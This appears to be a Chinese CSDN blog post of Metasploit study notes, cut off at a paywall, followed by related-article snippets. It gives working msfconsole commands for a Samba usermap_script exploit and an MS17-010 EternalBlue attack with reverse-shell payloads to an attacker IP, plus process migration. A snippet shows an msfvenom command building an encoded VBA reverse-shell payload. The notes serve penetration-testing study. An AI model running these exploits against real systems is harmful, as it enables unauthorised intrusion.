MSF学习

最新推荐文章于 2024-05-18 13:47:02 发布
最新推荐文章于 2024-05-18 13:47:02 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/110562260
版权
本文详细介绍了Metasploit的使用,包括Metasploit模块的分类和作用,如扫描、漏洞利用、后渗透攻击等。在主机扫描部分,讲解了如何使用nmap和Metasploit模块进行扫描。后渗透攻击部分,重点讨论了信息收集、权限提升、后门植入等技巧,如ms17-010漏洞利用、mimikatz抓取密码。同时,还涉及了Metasploit的免杀技术,如编码器模块和shellcode生成。
摘要由CSDN通过智能技术生成

目录

 

Metasploit模块

主机扫描

查找扫描模块

使用扫描模块

使用nmap扫描

搜索和使用samba的漏洞利用模块

后渗透攻击:信息收集

使用ms17-010对win7进行渗透

进程迁移

查看系统信息

截图

文件系统命令

权限提升

将meterpreter转换为后台执行

令牌窃取

hash攻击

或者上传pwdump,wce工具获取hash

使用mimikatz抓取密码

后渗透攻击:后门

1.Cymothoa后门

2.Persistence后门

3.web后门

3.2Aspx Meterpreter后门

 

Metasploit模块

1、Exploit :渗透测试攻击:缓冲区溢出、Web应用程序漏洞攻击、系统配置错误
2、Payload :攻击载荷;
3、Shellcode :指令: Meterpreter Shell
4、Module :模块;
( 1 ) Payload Module ,渗透测试攻击模块;
辅助模块: auxiliary module ,简称: AUX
(2)NOPModule;
( 3 ) Encoding Module ,编码器模块;
( 4 ) POST Module ,后渗透攻击模块
 

使用MSF渗透测试时,大致步骤

  • 扫描目标系统,寻找可以利用的漏洞
  • 选择并配置一个漏洞利用模块
  • 选择并配置一个攻击载荷模块
  • 选择一个编码技术,用来绕过杀毒软件的查杀
  • 渗透攻击

 

MSF使用

1.kali下使用

msfdb
msfdb init


msfconsle
db_status

 

2.其他linux

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall


addusermsf
su msf
cd /opt/metasploit-framework/bin/
./msfconsole

 

 

主机扫描

查找扫描模块

search portscan

使用扫描模块

use auxiliary/scanner/portscan/tcp

辅助模块还有其他扫描模块,如Mysql,VNC,FTP,SMB

使用nmap扫描

nmap 192.168.0.104 -sV -p 1-1000 -T4

 

搜索和使用samba的漏洞利用模块

search samba
use exploit/multi/samba/usermap_script     

show PAYLOADS
set PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.0.104
set RPORT 445
set LHOST 192.168.0.109
show options
exploit

 

后渗透攻击:信息收集

使用ms17-010对win7进行渗透

nmap 192.168.0.106 -p-
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
show payloads
set payload windows/x64/meterpreter/reverse_tcp
设置参数
exploit

 

进程迁移

getpid
ps
migrate 4312
kill 1128 
run post/windows/manage/migrate     #自动进程迁移

最低0.47元/天 解锁文章
kongytr
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
MSF学习笔记(10)
Shadow 爬爬记
12-11 699
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
msf学习之旅
12306小哥
11-11 947
从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。 Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040) #msfconsole msf > search ms06-040 msf > use ...
MSF学习笔记
mohanhan
06-24 382
使用MSF生成木马_入侵win7 1 生成木马 先通过kali自带功能生成一个木马(123.exe) -f 输出格式 -o 输出地址 生成木马一般需要点时间 2 启动msf msfconsole 然后进行设置攻击参数&&启动攻击 3 让123.exe在目标机器执行 模拟黑客或是社工手法(这里方法多种多样),让木马文件123.exe在目标win7上运行 4 查看监听回显数据 木马已经运行了,现在返回msf 查看,发现建立了一条会话,查看下windows系统信息 5 后续操作 截取
学习笔记】msf的使用
chualam的博客
10-29 275
目标主机:2003rs2 漏洞:cve-2017-7269 ms17-010 exp搜索 : search cve-xxx 利用:use exp名称 看配置:show options 配置:set 配置名 一个值 设置payload:set payload windows/meterpreter/reverse_tcp(反弹shell) 最终攻击:exploit 把shell放后台:background 交互:session -l 然后 session -i 1 添加路由攻击内网:run autoroute
MSF学习—MS08-067
Vincent0sen的博客
09-02 1228
MS08-067
MSF学习笔记(11)
Shadow 爬爬记
02-12 935
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
msf 学习笔记(1)
Shadow 爬爬记
10-20 1336
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
MSF学习笔记(6)
Shadow 爬爬记
12-05 676
MSF WEB应用扫描器wmapmsf > load wmap #load wmap模块 msf > help #查看wmap可用命令wmap Commands ============= Command Description ------- ----------- wmap_modules Manage wmap modules wma
MSF -基于扩展卡尔曼滤波器 (EKF) 的多传感器融合 模块化框架_C++_代码_相关文件_下载
07-13
描述 基于EKF的时延补偿单传感器和多传感器融合框架。 更多详情、使用方法,请下载后细读README.md文件
无人驾驶算法学习:多传感器融合MSF算法
02-24
本文的多传感器融合是建立在读懂《Quaternionkinematicsfortheerror-stateKalman?lter》基础上的,是一种相机和IMU融合的理论,里面讲解了IMU的误差状态运动方程构建。误差状态四元数,是有开源的程序的,但是它是集成在rtslam里面的,不方便提取出来使用。但还有另外一个开源的程序,ETH的MSF,可以比较方便地用在自己的工程里面,并且它的理论与误差状态四元数很接近,稍微有点不同,所以MSF开源程序就成了一个不错的选择。所以本人研究了ETH的两篇文章:《VisionBasedNavigationforMicroHelicopters》和《ARobusta
Metasploit(MSF)基础超级详细版
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
msf学习笔记(2)
Shadow 爬爬记
11-02 529
exploit分类Active exploit示例:msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost 192.168.1.100 rhost => 192.168.1.100 msf exploit(psexec) > set payload windows/shell/reverse_tcp payload =
生命在于学习——MSF初体验(一)
易水哲的博客
10-20 2980
Metasploit初体验(一)
2024最新最全【MSF基础与应用】零基础入门到精通,看完这一篇就够了!
最新发布
wholeliubei的博客
05-18 496
Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。MSF可以运行在linux和windows环境下,我们一般通常都在kali linux操作系统上使用。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 3489
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
无人驾驶算法学习(六):多传感器融合MSF算法
热门推荐
蒋成的博客
05-06 1万+
文章目录1.引言2. 算法理论2.1 MSF基本模型2.2 预测2.3 测量与更新3. 核心代码分析4. 代码实战 1.引言 本文的多传感器融合是建立在读懂《Quaternion kinematics for the error-state Kalman filter》基础上的 ,是一种相机和IMU融合的理论,里面讲解了IMU的误差状态运动方程构建。误差状态四元数,是有开源的程序的,但是它是集成在r...
msf 渗透工具学习材料
08-20
MSFMetasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值